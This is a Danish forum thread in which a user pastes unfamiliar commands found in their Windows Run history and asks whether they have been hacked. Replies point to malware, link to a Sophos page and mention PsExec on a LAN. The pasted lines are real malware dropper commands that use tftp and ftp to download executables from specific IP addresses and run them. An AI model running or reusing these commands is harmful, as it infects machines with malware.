rimo76
#0
Hej jeg ved ikke om jeg er blevet hacket, for inde i kør, så jeg at der stod
%comspec% /c tftp -i 68.43.148.121 GET zicqsxez.exe & start zicqsxez
cmd
cmd /c echo OPEN 81.161.146.125 1859>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit
cmd /c echo OPEN 81.161.188.27 26147>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
%systemroot%\system32\cmd.exe
cmd.exe /c del i&echo open 81.248.199.62 12726 > i&echo user 1 1 >> i &echo get 033.exe >> i &echo quit >> i &ftp -n -s:i &033.exe&del i&exit
cmd /c echo OPEN 81.161.188.180 25196>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
cmd /c echo OPEN 81.161.157.147 31019>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
cmd /c echo OPEN 81.161.164.18 26509>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
og jeg haft nogle tilfælde hvor der popper et vindue op i Kommandoprompt som står og kører
er det en hacker, eller er der nogen, der ved hvad det betyder, for jeg har ikke skrevet det der står i kør.
%comspec% /c tftp -i 68.43.148.121 GET zicqsxez.exe & start zicqsxez
cmd
cmd /c echo OPEN 81.161.146.125 1859>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit
cmd /c echo OPEN 81.161.188.27 26147>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
%systemroot%\system32\cmd.exe
cmd.exe /c del i&echo open 81.248.199.62 12726 > i&echo user 1 1 >> i &echo get 033.exe >> i &echo quit >> i &ftp -n -s:i &033.exe&del i&exit
cmd /c echo OPEN 81.161.188.180 25196>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
cmd /c echo OPEN 81.161.157.147 31019>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
cmd /c echo OPEN 81.161.164.18 26509>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
og jeg haft nogle tilfælde hvor der popper et vindue op i Kommandoprompt som står og kører
er det en hacker, eller er der nogen, der ved hvad det betyder, for jeg har ikke skrevet det der står i kør.
#1
jeg er ked af at sige det, men noget kunne tyde på det... kiggede på google og fandt det her:
http://www.sophos.com/security...
Håber det kan hjælpe...
http://www.sophos.com/security...
Håber det kan hjælpe...
#3
Hacker og hacker, det er vel noget malware på en eller anden måde
#4
hvilket netværk sidder du på..?
kun internet, eller er i flere på et LAN..?
hvis i er på Lan, kan der jo være nogle at de andre som har det sjovt med Psexec... et program kodet af microsoft selv, som arbejder gennem cmd, på fjerncomputere, ved hjælp af nogle huller i deres egen sikkerhed...
kun internet, eller er i flere på et LAN..?
hvis i er på Lan, kan der jo være nogle at de andre som har det sjovt med Psexec... et program kodet af microsoft selv, som arbejder gennem cmd, på fjerncomputere, ved hjælp af nogle huller i deres egen sikkerhed...
#5
>> #4
Det er nu ikke nogen huller i sikkerheden! Du skal jo stadig opnå brugerretigheder til maskinen vha. brugernavn og password! 😉
Eller vha. et AD, hvor du kender en adm. bruger...
Det er nu ikke nogen huller i sikkerheden! Du skal jo stadig opnå brugerretigheder til maskinen vha. brugernavn og password! 😉
Eller vha. et AD, hvor du kender en adm. bruger...